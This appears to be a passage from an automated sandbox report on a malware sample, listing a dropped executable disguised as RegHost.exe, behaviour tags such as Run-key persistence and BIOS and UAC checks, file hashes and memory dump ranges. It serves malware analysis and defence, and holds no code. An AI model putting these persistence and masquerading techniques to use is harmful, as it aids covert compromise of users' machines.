C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"21⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1424 -s 42822⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Local\Temp\a.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exeMD5
488bf62441ff75040d50da4c2bec376b
SHA129931ab97f4cb72be955fd51994a895732da871e
SHA256afaa0c0a07bab46b47bb11c43f4f9d7d53f9bcd7be742f8b350c19e13d70fdf9
SHA512ea5d8003f438fd0f220e0d0db76c47fc4ada982e65755e13e0fea8069da063075ef7a6930bf84ed7e2a4b6ccea5edab3ac03be51bbe888f522bbad183dde3047
-
memory/64-163-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/64-162-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/64-161-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/644-185-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/644-186-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/644-187-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/832-179-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/832-178-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/832-177-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/980-199-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1288-181-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/1300-143-0x0000000005290000-0x00000000052DB000-memory.dmpFilesize
300KB
-
memory/1300-144-0x0000000006240000-0x00000000062D2000-memory.dmpFilesize
584KB
-
memory/1300-145-0x00000000067E0000-0x0000000006CDE000-memory.dmpFilesize
5.0MB
-
memory/1300-146-0x0000000006400000-0x000000000641E000-memory.dmpFilesize
120KB
-
memory/1300-147-0x00000000066E0000-0x0000000006730000-memory.dmpFilesize
320KB
-
memory/1300-148-0x0000000006FB0000-0x0000000007172000-memory.dmpFilesize
1.8MB
-
memory/1300-149-0x0000000007DC0000-0x00000000082EC000-memory.dmpFilesize
5.2MB
-
memory/1300-138-0x00000000057E0000-0x0000000005DE6000-memory.dmpFilesize
6.0MB
-
memory/1300-142-0x00000000051D0000-0x00000000057D6000-memory.dmpFilesize
6.0MB
-
memory/1300-137-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/1300-139-0x00000000051F0000-0x0000000005202000-memory.dmpFilesize
72KB
-
memory/1300-140-0x0000000005320000-0x000000000542A000-memory.dmpFilesize
1.0MB
-
memory/1300-141-0x0000000005250000-0x000000000528E000-memory.dmpFilesize
248KB
-
memory/1424-225-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1424-226-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1424-227-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1560-183-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1648-170-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1648-169-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1648-171-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1872-153-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmpFilesize
3.9MB
-
memory/1872-152-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmpFilesize
3.9MB
-
memory/1872-154-0x00007FF7F8630000-0x00007FF7F8A18000-memory.dmpFilesize
3.9MB
-
memory/1884-211-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1884-210-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1884-209-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1964-203-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1964-201-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/1964-202-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2264-197-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/2392-219-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2392-217-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2392-218-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2516-193-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2516-195-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2516-194-0x00007FF702120000-0x00007FF702508000-memory.dmpFilesize
3.9MB
-
memory/2540-205-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/2580-176-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2620-130-0x0000000008060000-0x00000000080AB000-memory.dmpFilesize
300KB
-
memory/2620-133-0x0000000004844000-0x0000000004846000-memory.dmpFilesize
8KB
-
memory/2620-126-0x0000000007B20000-0x0000000007B86000-memory.dmpFilesize
408KB
-
memory/2620-122-0x00000000073F0000-0x0000000007A18000-memory.dmpFilesize
6.2MB
-
memory/2620-127-0x00000000072F0000-0x0000000007356000-memory.dmpFilesize
408KB
-
memory/2620-128-0x0000000007D10000-0x0000000008060000-memory.dmpFilesize
3.3MB
-
memory/2620-129-0x0000000007BB0000-0x0000000007BCC000-memory.dmpFilesize
112KB
-
memory/2620-131-0x0000000008300000-0x0000000008376000-memory.dmpFilesize
472KB
-
memory/2620-125-0x00000000072B0000-0x00000000072D2000-memory.dmpFilesize
136KB
-
memory/2620-124-0x0000000004842000-0x0000000004843000-memory.dmpFilesize
4KB
-
memory/2620-132-0x0000000004843000-0x0000000004844000-memory.dmpFilesize
4KB
-
memory/2620-123-0x0000000004840000-0x0000000004841000-memory.dmpFilesize
4KB
-
memory/2620-121-0x00000000047B0000-0x00000000047E6000-memory.dmpFilesize
216KB
-
memory/2908-224-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/2956-155-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/2956-157-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3104-173-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3136-216-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3192-167-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3280-156-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3280-158-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3480-189-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3484-135-0x0000000005620000-0x0000000005662000-memory.dmpFilesize
264KB
-
memory/3484-118-0x00000000004B0000-0x00000000004C2000-memory.dmpFilesize
72KB
-
memory/3484-136-0x00000000059C0000-0x0000000005A0C000-memory.dmpFilesize
304KB
-
memory/3484-134-0x00000000028E0000-0x0000000002900000-memory.dmpFilesize
128KB
-
memory/3484-192-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3536-221-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3620-208-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/3704-213-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB
-
memory/3936-165-0x0000000140000000-0x0000000140815000-memory.dmpFilesize
8.1MB